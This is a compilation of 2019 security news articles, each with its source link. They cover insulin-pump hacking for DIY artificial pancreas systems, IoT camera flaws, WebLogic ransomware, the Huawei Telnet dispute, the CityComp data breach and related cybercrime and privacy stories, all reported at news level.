STE WILLIAMS

Eight years ago, thanks to 10-year-old code that failed to use encryption to conceal the content of its wireless transmissions, security researcher Barnaby Jack successfully hacked a Medtronic insulin pump and proved it’s feasible to poison a diabetic wearer with a potentially lethal overdose.

If diabetic equipment hackers cared about money, that security flaw would now be worth more than gold. But they don’t.

What the community of people devoted to hacking their way to better diabetes management through homemade, closed-loop systems care about is helping themselves, loved ones and each other to climb over the lag in Federal Drug Administration (FDA) approval of such systems.

Medtronic hasn’t sold those flawed pumps for years. You can still get them, though, and an army of people dedicated to hacking insulin pumps has arisen to source them wherever they can find them, including on an underground market for medical devices that exists in places like eBay, Craigslist, or Facebook.

This is nothing new. Hackers first realized they could exploit the security flaw for a DIY diabetes revolution back in 2014. And on Monday, The Atlantic published a comprehensive look at how they’re hunting down the obsolete, security flaw-ridden devices, which can be used to create artificial pancreases because they’re so conveniently hackable.

DIY pancreas

The pancreas of a Type 1 diabetic doesn’t produce insulin, or doesn’t produce enough, to keep blood sugar levels under control. That lack of control will eventually lead to death if the hormone isn’t administered manually, whether it be through multiple daily injections or via insulin pumps that do it automatically and continuously, feeding a steady drip of insulin through thin, disposable tubing that’s inserted under the skin.

Another crucial part of diabetes care is a continuous sensor that measures blood sugar levels, which also slips just under the skin.

Tie together insulin delivery with CGM data, throw in some algorithms that can dynamically respond to rising and falling blood sugar by adjusting insulin delivery, and you’ve got an artificial pancreas. The idea is like the promised land to Type 1 diabetics: without the need to continuously monitor blood sugar levels, they can actually sleep through the night.

Many now can’t, given how CGM alerts jolt them awake, calling them to action, be it through eating something to fend off low blood sugar (potentially lethal) or to administer more insulin to fend off high blood sugar (also dangerous and potentially lethal).

It’s not that we don’t have all the hardware components now. We had the components to create an artificial pancreas back in 2014, as well. The problem was, and still is, that the pumps couldn’t talk to the sensors. That’s where the Medtronic pump’s security flaw came in.

The hackers realized they could exploit that flaw to override the programming in the old Medtronic pumps, substituting their own algorithm that automatically calculates insulin doses based on real-time glucose data. As the Atlantic puts it, it closed the feedback loop.

Multiple looping systems now available

The hackers made the code available online as OpenAPS – the Open Artificial Pancreas System project – and homemade “looping” was born. Besides OpenAPS, there’s also now another system called Loop. There are communities that have grown up around the technologies to help what the Atlantic says are now thousands of people who are experimenting with DIY artificial pancreas systems.

The FDA hasn’t officially approved any of them. That isn’t stopping diabetics and their helpers, though, whose war cry is #WeAreNotWaiting.

As word has spread, the old, compatible Medtronic pumps have gotten ever tougher to hunt down. The Atlantic spoke to one diabetic who got lucky enough to win one in a periodic raffle held by an online group for diabetics – that’s how coveted they are.

Aren’t these diabetics frightened of malicious Wi-Fi hacks?

When Jack first hacked the Medtronic back in 2011, the news was met with alarm, as are any security flaws that could lead to somebody dying. It was yet another example of how the FDA wasn’t taking the issue of medical device hacking seriously, critics said.

But the remote possibility that somebody’s going to scan for their pumps’ serial numbers and get physically close enough to remotely take it over don’t come close to offsetting the relief that loopers get from being able to simply relax when it comes to the constant vigilance that is the lot of diabetics. The Atlantic quotes one looper, Doug Boss, who said that the everyday risks of high and low blood sugar are a lot more real than the possibility of a malicious hacker lurking around a corner:

If I drink coffee in the morning and forget to enter it into my phone, my blood sugar is going to be higher than normal.

Thank you, Barnaby Jack

It’s not often that we get the chance to write about the upside of a security flaw… if ever. This is the most positive one I’ve ever run across, at any rate. And it’s a welcome opportunity to thank the ingenious Barnaby Jack for calling the world’s attention to a security flaw that could have caused harm but did the opposite.

Barnaby Jack passed away in 2013. We lost you too soon, Mr. Jack, but as time goes on, we grow ever more grateful for your contributions.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/K8LO_XyF_YA/

A security researcher has discovered severe flaws in an Internet of Things (IoT) software feature called iLnkP2P, which renders the millions of consumer devices using it vulnerable to remote discovery and hijack.

Publicised by Paul Marrapese, neither iLnkP2P nor the Chinese company that developed it, Shenzhen Yunni Technology, will be familiar names to the people buying the products containing it.

Despite this, iLnkP2P was identified in at least two million devices made by companies including HiChip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.

The software’s purpose is to allow IoT devices such as security webcams, baby monitors, and smart doorbells to be configured quickly without having to know how to open ports in a broadband router’s firewall.

Instead, consumers can power on their new device and instantly connect to it in peer-to-peer (P2P) fashion using an app on their computer by entering a Unique Identifier (UID). Nice and easy to use but not, it turns out, a good architecture from a security point of view.

The flaws

The main iLnkP2P flaw is CVE-2019-11220, which for understandable reasons Marrapese doesn’t dwell on but he says allows attackers to carry out man-in-the-middle attacks and steal device passwords on the way to a device takeover.

However, it’s the second flaw, CVE-2019-11220, that allows attackers to discover which devices are vulnerable to the above weakness and reach out to them even when they’re on the other side of an apparently secure firewall using Network Address Translation (NAT).

Most of the devices don’t appear to use encryption. Marrapese even accuses one vendor of lying about the state of the encryption they use.

Any device using iLnkP2P is at risk. The easiest way to determine whether a device is using this is to look for the UID printed on a sticker on the side of the device (which corresponds to the first three of the four letters). This can then be checked against the list of 91 known UIDs published by Marrapese.

However, this list isn’t exhaustive – there could be further devices not listed that are using iLnkP2P and have different UIDs.

Fixing the hole

For owners of these devices, there don’t appear to be many mitigations beyond manually blocking the software’s UDP port, 32100. This will allow local access while blocking remote traffic. Alternatively, writes Marrapese:

Buy a new device from a reputable vendor. Research suggests that a fix from vendors is unlikely, and these devices are often riddled with other security problems that put their owners at risk.

Sure enough, when Marrapese contacted the affected makers several times between January and February, he heard nothing back.

And that’s the thing about so many IoT devices, especially ones made cheaply and quickly by manufacturers who seem more concerned with shifting units than worrying about aftersales. The fact that a flaw exists – and a big flaw at that – has no bearing on whether it will ever be patched.

Pessimistic perhaps but it’s a fundamental issue. Anyone buying a product that can’t or won’t be updated is buying something with a very short life expectancy.

It’s sometimes said that users don’t care enough about security to take action in their own interests but it’s hard to believe that anyone buying a webcam trained on the inside of their house would be happy at the thought of cybercriminals taking control of it.

This follows a wearying series of IoT security scares, including that many of the apps used to control these devices have security weaknesses of their own.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/E1nzOCxEsYE/

Our whole lives and livelihoods are wrapped up in our data.

That data is especially vulnerable at border crossings and in unfamiliar environments.

There are plenty of security products available on the internet for the privacy-minded traveler – if you feel like going shopping, a quick search will turn those up for you.

And if you really want an excuse to travel with a laptop and phone that you’ll acquire solely for your trip and then dispose of when you leave, you certainly can, but most people won’t.

But here are some tips you can use without spending tons of money on extra security gear.

Getting there – keep it encrypted, and travel light

If you need to bring data with you, make sure it’s encrypted with full disk encryption, and that your computer is turned off – not merely on standby – so that there are no encryption keys left in memory.

Keep in mind that border officials in some countries can require you turn on and unlock your devices, and they may be allowed to make and keep copies of your data, as a condition of entry.

If you refuse you might be denied entry, or even detained. So think of encryption more as protection from data loss should your hard drive or machine be stolen or physically lost.

If this is unacceptable to you, travel light and leave your devices and their data at home.

It depends on what’s at risk for you and what your tolerance for risk is, but less you have with you, the less you have to lose.

When you’re there, mind what you connect to

Think before you charge a device using a USB port on someone else’s device, even if it looks like a plain old charger.

Consider carrying a cable or adapter of your own that you know has only its power wires connected – if the USB data wires are missing from the cable then it then can’t be used to sneak data onto or off your device.

Also, if you rent a car, avoid pairing your phone with its computer system, no matter how convenient that might be. You may end up leaving behind more than you intended, including your device name, contact data and call details.

When it comes to accessing data remotely, stick to basic internet hygiene procedures.

Avoid accessing sensitive services via public access points, and consider using a VPN to encrypt all your network traffic (it local regulations allow) back to your home or company network to reduce the amount you leak out to eavesdroppers.

Final note

If you’re traveling abroad and not bringing any of your kit with you but plan on accessing your cloud-based services from a new computer, remember that your new device and new geolocation could trigger security alerts on your account.

At the very least, if you have 2FA (two-factor authentication) enabled on your account (and you should if you have the option!), make sure you have your token generator or phone with you so you can get access.

If you use SMS to receive your 2FA codes, you’ll want to be sure your phone plan allows you to receive SMS while abroad. (This is something you can resolve while abroad, but it’s a lot easier to take care of before you leave, speaking from personal experience.)

Similar advice applies if you use a password manager: make sure you have the tools to access it on the go, such as the token generator if it’s locked with 2FA.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/lSQuWuTFMfA/

IT admins overseeing Oracle’s WebLogic Server installations need to get patching immediately: miscreants are exploiting what was a zero-day vulnerability in the software to pump ransomware into networks.

The Cisco Talos security team said one its customers discovered it had been infected via the bug on April 25, though the exploit is believed to have been kicking around the web since April 17. The programming blunder at the heart of the matter is a deserialization vulnerability that can be exploited to execute malicious code on a remote WebLogic server with no username or password needed. A hacker just needs to be able to reach the at-risk service across the internet or network to infiltrate it.

“WebLogic’s design makes it particularly prone to these types of vulnerabilities,” said Johannes Ullrich, dean of research at the SANS Technology Institute, in an advisory this week. “Do not expose WebLogic to the Internet if you can help it. I doubt that this was the last such vulnerability.”

The flaw was first identified by Chinese and Taiwanese researchers, and the first official alert was sent out by China’s National Vulnerability Database and assigned CVE-2019-2725. Oracle rushed out an out-of-band patch on Friday, April 26, rating it 9.8 out of 10 on the severity scale and urged everyone to get patching – although Big Red being what it is, you’ll need a suitable support contract to get the fix, it appears.

As Ellison and Co put it: “Patches released through the Security Alert program are provided only for product versions that are covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.

“Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities. As a result, Oracle recommends that customers upgrade to supported versions.”

A brand new nasty

According to the Talos team, miscreants were spotted using the WebLogic flaw to inject ransomware called Sodinokibi into at least one corporate network. Once they were able to execute code on a vulnerable system, the hackers pulled the file-scrambling malware down from two IP addresses – 188.166.74[.]218 and 45.55.211[.]79. The former is a known host for malicious software, though the latter appears to be linked to a legit website in Chile that was pwned to act as a launch pad for the attack.

Brit Police Federation cops to ransomware attack on HQ systems

READ MORE

Specifically, the criminals used PowerShell on vulnerable Windows-based boxes to download down a file dubbed radm.exe, which contained the ransomware. Once run, it disabled the default Windows backup mechanisms, to make recovery harder, mass-encrypted documents, and then opened a window demanding a payment in Bitcoin that would double if not paid within three days.

Eight hours after the initial attack, the malware operators returned to download and run a second piece of malware, Gandcrab v5.2, which was release on February 19 this year.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target,” said Team Talos. “Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.”

The team – Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites – said Talos was able to help its customer clean up the infection, but warned that many more are likely to come. Given the large number of WebLogic servers out there, this attack vector is bound to be reused. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/05/01/oracle_weblogic_attack/

NordVPN has been told to stop misleading world+dog with claims in telly ads that public Wi-Fi is inherently insecure.

Britons will be familiar with NordVPN’s recent ad spot, which featured some credulous loon in a railway carriage handing out his credit card, phone, passwords and so on to random strangers.

The Advertising Standards Authority, a private company based in central London that is funded by a levy on the advertising industry, has now told NordVPN not to repeat the advert’s claims that public Wi-Fi is so insecure that it amounts to handing out your personal details to everyone around you.

Nine people complained about the advert, which was broadcast in the first quarter of this year.

There’s NordVPN odd about this, right? Infosec types concerned over strange app traffic

READ MORE

Justifying its claims, NordVPN told the ASA that HTTPS encryption of webpages “did not mean the site was legitimate, nor was it any proof that the site had been security-hardened against intrusion from hackers”. It added that “most public Wi-Fi hotspots were considered insecure since the majority had very primitive security parameters and non-existent or very weak passwords available to everyone.”

Disagreeing, the ASA acknowledged in a public ruling that while “such data threats could exist”, it “considered the overwhelming impression created by the ad was that public networks were inherently insecure and that access to them was akin to handing out security information voluntarily.”

“Because the ad created the impression that users were at significant risk from data theft, when that was not the case, we concluded it was misleading” concluded adland’s gummy mouthed self-regulator.

The ruling comes not long after Reg readers got in touch after noticing NordVPN’s app generating some strange traffic to unregistered web domains.

Earlier this month, UK ISP Cityfibre lost a judicial review it brought against the ASA over how fibre broadband is advertised by its commercial rivals. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/05/01/nordvpn_tv_ad_rapped_advertising_standards_authority/

Former WikiLeaker-in-chief Julian Assange has been sentenced to 11 months in prison after jumping bail and fleeing into Ecuador’s London embassy for more than seven years.

Delivering sentence at Southwark, her honour Judge Deborah Taylor said: “Your continued residency [in Ecuador’s London embassy] has cost £16m of taxpayers’ money. No one is above the reach of the law.”

Announcing her sentence of 50 weeks – two weeks short of the maximum punishment she could impose – HHJ Taylor said: “It’s difficult to envisage a more serious example of this offence.”

“I have taken into account all that has been said on your behalf in mitigation, including the background history of this case which has been set out in some detail,” said HHJ Taylor as she summed up the case against Assange.

“Whilst you may have had fears as to what may happen to you, nonetheless you had a choice, and the course of action you chose was to commit this offence in the manner and with the features I have already outlined. In addition, I reject the suggestion that your voluntary residence in the Embassy should reduce any sentence. You were not living under prison conditions, and you could have left at any time to face due process with the rights and protections which the legal system in this country provides.”

Assange’s barrister, Mark Summers, told the court that Assange had feared “further removal to Sweden and the US” if he was jailed in the UK – a fear that, ironically, is now coming to pass with tomorrow’s scheduled extradition hearing at Westminster Magistrates’ Court.

“He feared being kidnapped wherever he was in the world and taken to US, renditioned. There were calls for his execution and assassination,” said Summers, adding: “As a result of those actions and the limited choices he had to protect himself against that risk, he has suffered great consequences, he has spent seven years in confined conditions that may or may not be equated to that of prison.”

Sporting a trimmed beard and neater haircut than in the famous footage and pictures of him being dragged from the Ecuadorean embassy, Assange himself sat blank-faced, locked in the dock, as the lawyers argued for and against him.

Expressing remorse, Assange had also written a letter to the judge, which was handed up to her in court and read out.

Assange apologises unreservedly for how he has pursued his case. “I found myself struggling through terrifying circumstances… I did what I thought at the time was best… which I hope will lead to a legal resolution between Ecuador and Sweden.”

— Jordan Milne (@JEMilneSky) May 1, 2019

The longest sentence that the one-time cupboard-dweller could have faced is 12 months in prison. Under current British sentencing laws, that would have been automatically halved in any event.

Assange will spend a maximum of 22 weeks in prison. Having spent almost three weeks (20 days) on remand, that time is deducted from his full sentence.

It is unlikely that he will be released from British custody while the US extradition proceedings against him are ongoing, having already presented himself as a flight risk to the British authorities.

Assange’s supporters chanted “shame on you” as the Australian was led to the cells. He will appear in custody at Westminster Magistrates’ Court tomorrow to begin his extradition battle against the US authorities. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/05/01/julian_assange_sentenced_50_weeks_jumping_bail/

A claimed deliberate spying “backdoor” in Huawei routers used in the core of Vodafone Italy’s 3G network was, in fact, a Telnet-based remote debug interface.

The Bloomberg financial newswire reported this morning that Vodafone had found “vulnerabilities going back years with equipment supplied by Shenzhen-based Huawei for the carrier’s Italian business”.

“Europe’s biggest phone company identified hidden backdoors in the software that could have given Huawei unauthorized access to the carrier’s fixed-line network in Italy,” wailed the newswire.

Unfortunately for Bloomberg, Vodafone had a far less alarming explanation for the deliberate secret “backdoor” – a run-of-the-mill LAN-facing diagnostic service, albeit a hardcoded undocumented one.

“The ‘backdoor’ that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet,” said the telco in a statement to The Register, adding: “Bloomberg is incorrect in saying that this ‘could have given Huawei unauthorized access to the carrier’s fixed-line network in Italy’.

“This was nothing more than a failure to remove a diagnostic function after development.”

It added the Telnet service was found during an audit, which means it can’t have been that secret or hidden: “The issues were identified by independent security testing, initiated by Vodafone as part of our routine security measures, and fixed at the time by Huawei.”

Huawei itself told us: “We were made aware of historical vulnerabilities in 2011 and 2012 and they were addressed at the time. Software vulnerabilities are an industry-wide challenge. Like every ICT vendor we have a well-established public notification and patching process, and when a vulnerability is identified we work closely with our partners to take the appropriate corrective action.”

Prior to removing the Telnet server, Huawei was said to have insisted in 2011 on using the diagnostic service to configure and test the network devices. Bloomberg reported, citing a leaked internal memo from then-Vodafone CISO Bryan Littlefair, that the Chinese manufacturer thus refused to completely disable the service at first:

Vodafone said Huawei then refused to fully remove the backdoor, citing a manufacturing requirement. Huawei said it needed the Telnet service to configure device information and conduct tests including on Wi-Fi, and offered to disable the service after taking those steps, according to the document.

El Reg understands that while Huawei indeed resisted removing the Telnet functionality from the affected items – broadband network gateways in the core of Vodafone Italy’s 3G network – this was done to the satisfaction of all involved parties by the end of 2011, with another network-level product de-Telnet-ised in 2012.

Broadband network gateways in 3G UMTS mobile networks are described in technical detail in this Cisco (sorry) PDF. The devices are also known as Broadband Remote Access Servers and sit at the edge of a network operator’s core.

The issue is separate from Huawei’s failure to fully patch consumer-grade routers, as exclusively revealed by The Register in March.

Plenty of other things (cough, cough, Cisco) to panic about

Characterising this sort of Telnet service as a covert backdoor for government spies is a bit like describing your catflap as an access portal that allows multiple species to pass unhindered through a critical home security layer. In other words, massively over-egging the pudding.

Many Reg readers won’t need it explaining, but Telnet is a routinely used method of connecting to remote devices for management purposes. When deployed with appropriate security and authentication controls in place, it can be very useful. In Huawei’s case, the Telnet service wasn’t facing the public internet, and was used to set up and test devices.

Look, it’s not great that this was hardcoded into the equipment and undocumented – it was, after all, declared a security risk – and had to be removed after some pressure. However, it’s not quite the hidden deliberate espionage backdoor for Beijing that some fear.

Twitter-enabled infoseccer Kevin Beaumont also shared his thoughts on the story, highlighting the number of vulns in equipment from Huawei competitor Cisco, a US firm:

I saw the report too, it’s bullshit in angle – millions of routers and switches across the world have Telnet enabled. Cisco’s had something like 7 actual backdoor accounts this year so far, I wait for the similar Bloomberg report about them.

— Kevin Beaumont 🧝🏽‍♀️ (@GossiTheDog) April 30, 2019

For example, a pretty bad remote access hole was discovered in some Cisco gear, which the mainstream press didn’t seem too fussed about. Ditto hardcoded root logins in Cisco video surveillance boxes. Lots of things unfortunately ship with insecure remote access that ought to be removed; it’s not evidence of a secret backdoor for state spies.

Given Bloomberg’s previous history of trying to break tech news, when it claimed that tiny spy chips were being secretly planted on Supermicro server motherboards – something that left the rest of the tech world scratching its collective head once the initial dust had settled – it may be best to take this latest revelation with a pinch of salt. Telnet wasn’t even mentioned in the latest report from the UK’s Huawei Cyber Security Evaluation Centre, which savaged Huawei’s pisspoor software development practices.

While there is ample evidence in the public domain that Huawei is doing badly on the basics of secure software development, so far there has been little that tends to show it deliberately implements hidden espionage backdoors. Rhetoric from the US alleging Huawei is a threat to national security seems to be having the opposite effect around the world.

With Bloomberg, an American company, characterising Vodafone’s use of Huawei equipment as “defiance” showing “that countries across Europe are willing to risk rankling the US in the name of 5G preparedness,” it appears that the US-Euro-China divide on 5G technology suppliers isn’t closing up any time soon. ®

Bootnote

This isn’t shaping up to be a good week for Bloomberg. Only yesterday High Court judge Mr Justice Nicklin ordered the company to pay up £25k for the way it reported a live and ongoing criminal investigation.

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/30/huawei_enterprise_router_backdoor_is_telnet/

A service provider hired by the likes of Oracle, SAP, BT, and many others, to manage their IT systems has been hacked – and its client data held to ransom.

At the turn of this month, Germany-based CityComp was broken into by a miscreant, who pinched troves of private information from its customer database and threatened to publicly reveal all that stolen data unless a ransom was coughed up.

The hacker, going by the name Boris, told The Register that right now a partial sample of the swiped info is available to download from a Tor-hidden dark web site, and because the ransom of $5,000 was not paid by CityComp, the full archives are set to be released today.

CityComp boasts it looks after “more than 70,000 servers and storage systems of all types and sizes in up to 75 countries. In addition, we provide support for more than 500,000 client hardware (PC, workstation, printer, cash register).”

In other words, it’s hired to install, maintain, repair, and remove IT equipment for scores of companies, ranging from Oracle, SAP, BT, Toshiba, VW and Airbus to Porsche, Hugo Boss, Ericsson and ATOS.

According to Register sources who have seen the partially leaked information, the data so far includes things like contact information for CityComp’s customers – such as names, email addresses and phone numbers – notes of meetings with clients, and IT equipment inventories, such as model numbers, specifications, and serial numbers. How much is available to download depends on the victim: some have a few spreadsheets of contact details leaked, and some have what’s said to be long lists of installed computer gear and other documentation.

This information could be useful to criminals seeking any inside information to pull off targeted cyber-attacks against certain corporations. We’re not talking direct identity theft, here.

According to Boris, “312,570 files in 51,025 folders, over 516 Gb data financial and private information on all clients, include VAG, Ericsson, Leica, MAN, Toshiba, UniCredit, British Telecom and etc,” was stolen from the German service provider.

Swag … Screenshot of dark-web site offering some of the stolen materials for download, redacted for privacy reasons (Credit: Register sources)

Michael Bartsch, of infosec outfit Deutor, which has been drafted in to handle the aftermath of CityComp’s network intrusion, told El Reg “the stolen data is mostly data about hardware inventories, like hardware type, OS, memory, serial numbers, etc. Only a few personal data records were affected.”

Bartsch, who has been authorized to speak on behalf of CityComp, also confirmed that while the cyber-break-in has been thwarted, affected servers unplugged, and security shored up, more customer information may well leak out beyond what’s already available because CityComp “does not yield to blackmail.” German cops and prosecutors have also been alerted, we’re told:

CityComp Service GmbH was the victim of a targeted cyberattack in early April 2019. A still unknown perpetrator has stolen customer data of CityComp and threatened the company with publication, should it not comply with the blackmail attempt.

CityComp with the help and support of external experts and the State Criminal Police Office of Baden-Württemberg successfully fended off the attack and implemented supplementary security measures of all systems. The incident analysis of Deutor Cyber Security Solutions GmbH, G DATA Advanced Analytics GmbH and the Federal State Police Baden-Württemberg showed that at no point any indication for a risk of further infection of customer and partner systems, but for security reasons some of the systems have nevertheless been disconnected.

Since CityComp does not comply with blackmail the publication of customer data could not be prevented. The stolen data has now been published by the perpetrators and CityComp’s customers were informed about it.

In cooperation with the State Office for Criminal Investigation Baden-Württemberg suitable measures for prosecution were initiated. At an early stage CityComp was transparent and informed the relevant data protection authorities and customers about the cyberattack and data theft. Full transparency was in place right from the start.

Due to this cyber-attack CityComp has implemented further technical and organizational measures to increase its security in order that such an attack will not occur again in the future.

Finally, Boris told us that CityComp at first showed interest in paying the ransom in exchange for his or her silence and technical details of the intrusion, but it appears once the service provider learned of the vulnerability exploited by the hacker to steal the information, it backed out, fixed up the hole, and refused to pay. Boris claimed many companies cough up the cash to keep leaks private and holes patched when he or she contacts them.

“At the beginning of our communication, they [CityComp] agreed that they will pay for our work and we will help them to eliminate vulnerabilities in their network, but they deceived us,” said Boris. “Many companies pay us for our work, and we do not publish data and help them to eliminate vulnerabilities.”

We’ve contacted many of CityComp’s customers affected by this security breach, first reported earlier today by Motherboard, including Oracle, BT, Airbus, Ericsson, Hugo Boss, NH Hotels, and Toshiba. Spokespeople were not available for immediate comment. ®

Additional reporting by Iain Thomson.

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/30/citycomp_hacked/

A Russian citizen has been charged with defrauding US taxpayers out of at least $1.5m through a series of tax-return hacks.

Anton Bogdanov, 33, was formally charged this week with wire fraud conspiracy, aggravated identity theft and computer intrusion this week at federal court in Brooklyn, having been arrested in Thailand in November and extradited to America last month.

Bogdanov, and his unnamed co-conspirators, are accused of obtaining stolen personal information, such as social security numbers and dates of birth, it’s claimed. Where exactly this info came from isn’t mentioned. Between June 2014 and November 2016, this sensitive data was allegedly used by the Russian and his pals to log into taxpayers’ profiles on the IRS.gov website.

Once in, the miscreants would have access to past tax returns filed by their victims, and they used this data to make further false tax filings on their victims’ behalf, according to the Feds. Crucially, these new filings were written in a way that diverted tax refunds to prepaid debit cards, which prosecutors claim were controlled by Bogdanov.

The US government also asserts Bogdanov hacked into the computer network of an unnamed third-party tax filing company based in New York state through using a security hole in the remote access software the company uses for employees.

He is accused of using this illegal access to download previous tax returns for an unspecified number of individuals and exploit the information from those returns – including not only Social Security numbers and birthdays but also income and claimed expenses – to craft plausible tax returns on victims’ behalf from which they would receive tax rebates, the charges state.

Free online tax filing? Yeah, that’ll soon be illegal thanks to rare US Congressional unity

READ MORE

The rebates were then sent to debit cards in the US that Bogdanov and his co-conspirators had set up, it is claimed. Over the course of two years, they accumulated $1.5m in rebates, the indictment [PDF] alleged. A percentage of the proceeds were wired to Bogdanov in Russia, the US government insists.

The scam went unnoticed for over two years before access was cut off. It’s not clear how the scam was spotted: whether the individuals affected complained, or the tax filing company spotted unusual behavior.

Typically, Uncle Sam takes tax evasion extremely seriously – if you are an individual; if you’re a corporation, less so. As do tax filing companies like Intuit and HR Block: because if anyone is going to rip-off US citizens through their tax filing software, it is going to be the tax filing companies, OK Anton?

According to prosecutors, Bogdanov set up an elaborate structure and lived outside the US in an effort to stay out of the IRS’ reach. But he was tracked down to Thailand, and the FBI worked with the Royal Thai Police to nab him and extradite him to the States. If convicted, he faces up to 27 years in the slammer. ®

Sponsored:
Becoming a Pragmatic Security Leader

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/30/russian_irs_charge/

New tools, such as Compliance Manager and Advanced Message Encryption, aim to give businesses more options for data privacy.

Microsoft is rolling out a series of new capabilities designed to give businesses greater control over their data privacy practices, help meet compliance requirements, and investigate potential security threats.

The changes arrive as companies are taking a closer look at their privacy practices and monitoring information wherever it travels and resides. With more data moving to the cloud and consumers becoming more aware of organizations’ privacy standards, protecting that data has become priority.

One of the new capabilities is Office 365 Advanced Message Encryption, which gives admins additional controls to automatically expire, or revoke access to, encrypted emails sent outside the company via secure Web portal. For example, if a message has data such as health IDs, an admin can configure the settings so it’s encrypted and expires after 30 days or whatever compliance requirements dictate.

Microsoft is also adding data investigation capabilities, which businesses can use to analyze incidents such as data leaks or phishing attacks. Data investigation lets admins search affected content or individuals following a breach, then delete emails containing confidential data so users can’t view it. Data investigation is currently in preview, Microsoft notes in a blog post on today’s announcements.

New changes to Microsoft Teams aim to improve security and compliance for chats, meetings, and calls. These include data loss prevention and information barriers to prevent sensitive data from leaking.

There also are new features for Compliance Manager, a tool designed to help admins manage compliance across various data assets. Admins can now create their own assessments against any regulation or standard while including on-prem and non-Microsoft applications. This lets managers handle data protection controls, prep for audits, and work with different teams from Compliance Manager.

Compliance Manager integrates with the Secure Score API to detect settings and update controls accordingly. When security controls like multifactor authentication are implemented, the tool’s risk assessments reflect it. Compliance Manager updates are in public preview for commercial plans.

In another compliance-friendly move, Microsoft is extending Multi-Geo capabilities to SharePoint Online and Groups in addition to Exchange Online and OneDrive. Businesses face several compliance requirements as data residency rules are introduced around the world. Multi-Geo, which can be bought as an add-on to Microsoft 365 and Office 365, lets them choose where Office 365 content is stored at rest.

Related Content:

• Third-Party Cyber-Risk by the Numbers
• Threat Intelligence Firms Look to AI, but Still Require Humans
• 7 Types of Experiences Every Security Pro Should Have
• Security Vulns in Microsoft Products Continue to Increase

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/cloud/microsoft-365-updated-with-new-compliance-encryption-privacy-controls/d/d-id/1334573?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple